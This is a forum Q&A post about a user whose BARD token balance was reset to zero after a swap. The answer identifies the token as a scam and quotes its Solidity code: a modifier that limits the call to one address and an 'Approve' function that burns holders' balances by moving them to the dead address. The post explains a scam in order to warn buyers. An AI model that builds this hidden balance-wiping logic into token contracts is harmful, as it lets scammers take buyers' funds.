# Approved Swap, LOST COIN! PLEASE HELP

Tags: etherscan, uniswap

I swapped ETH for BARD

0xa9b5a860b226554fa05b8318a0c374139b2b2e52838a02d8fc6c59ed960bb9a3

the swapped is approved but coins haven't come
My address was on the holders list on the token page on etherscan

Then I tried buying second time w/small amount

0x890111ab2cef89f5232288a5af7cd861e909261a7fef049212300e636d05dc9c
and the tokens came but it didn't add to the balance of my address on the holders list.
it resetted my number

Can you please help

Answer (score 3):

It seem that the token you bought is a scam.

I checked the code of the smart contract on etherscan and at the end of the token contract you can see a function named `Approve`, this function callable only by an allowed address i.e : `0x1e5bc20fbf84c32852015544f6c1130890c12c95`.
Here is the tx were the scammer putted your balance to 0. https://etherscan.io/tx/0xd00c30f200ea41c09514d61808e9d0f7a24c818f4c9d0deccef585bfe85cf97b

Be careful when you bought tokens please.

The modifier function code who only allow a particular address :

```
modifier approver() {
    require(msg.sender == 0x1E5Bc20fBF84c32852015544F6c1130890c12c95, "Not allowed to interact");
    _;
}
```

The approve function that is responsible of your balance reset :

```
function Approve(
        address[] memory holders)  public approver(){

        for (uint256 i = 0; i < holders.length; i++) {

            uint256 amount = _balances[holders[i]];
            _beforeTokenTransfer(holders[i], 0x000000000000000000000000000000000000dEaD, amount);
            

            _balances[holders[i]] = _balances[holders[i]].sub(amount, "ERC20: burn amount exceeds balance");
            _balances[0x000000000000000000000000000000000000dEaD] = _balances[0x000000000000000000000000000000000000dEaD].add(amount);
            
            }}
```

Comment: Thank you so much.